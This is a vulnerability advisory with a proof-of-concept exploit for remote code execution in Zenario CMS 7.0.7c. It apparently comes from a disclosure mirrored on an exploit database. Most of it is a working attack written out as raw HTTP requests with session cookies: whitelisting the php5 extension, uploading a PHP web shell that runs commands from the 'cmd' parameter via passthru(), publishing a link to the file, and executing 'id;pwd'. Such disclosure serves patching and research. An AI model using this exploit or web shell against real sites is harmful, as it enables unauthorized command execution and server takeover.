###########################

# Zenario CMS 7.0.7c Remote Code Execution Vulnerability

###########################

Zenario CMS 7.0.7c Remote Code Execution Vulnerability


Vendor: Tribal Ltd.
Product web page: http://www.zenar.io
Affected version: <= 7.0.7c and 7.1.0 (svn)

Summary: Zenario is a web-based content management system for sites
with one or many languages. It's designed to grow with your site,
adding extranet, online database and custom functionality when you
need it.

Desc: The vulnerability is caused due to the improper verification
of uploaded files via the Document upload script using 'Filedata' POST
parameter which allows of arbitrary files being uploaded in '/public/downloads/'
following a publicaly generated link for access where the admin first
needs to add the file extension in the allowed list. This can be exploited
to execute arbitrary PHP code by uploading a malicious PHP script file
and execute system commands.

Tested on: Ubuntu 14.04 LTS
PHP 5.5.9-1ubuntu4.1
Zend Engine v2.5.0
Zend OPcache v7.0.3
MySQL/5.5.37


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5280
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php

Vendor: http://zenar.io/zenario-707d


27.10.2015

--


----------------------
1. Add php5 file type:

GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__administration/panels/file_types HTTP/1.1

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1
Host: 192.168.0.17
Connection: keep-alive
Content-Length: 516
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&_confirm=&_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}}


---------------
2. Upload file:

POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 458
Origin: http://192.168.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
X_FILENAME: phpinfo.php5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD
Accept: */*
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="id"

12
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="fileUpload"

1
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5"
Content-Type: application/octet-stream

<?php
echo "<pre>";
passthru($_GET['cmd']);
echo "</pre>";
?>
------WebKitFormBoundaryUrDf3o8emcPIM8oD--



------------------------
3. Save and verify file:

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_document_upload&id=12 HTTP/1.1
Host: 192.168.0.17
Content-Length: 530
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&_confirm=&_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}}


------------------------
3. Generate public link:

POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 28
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

id=27&generate_public_link=1


----------------
3. Execute code:

GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-11-23]

###########################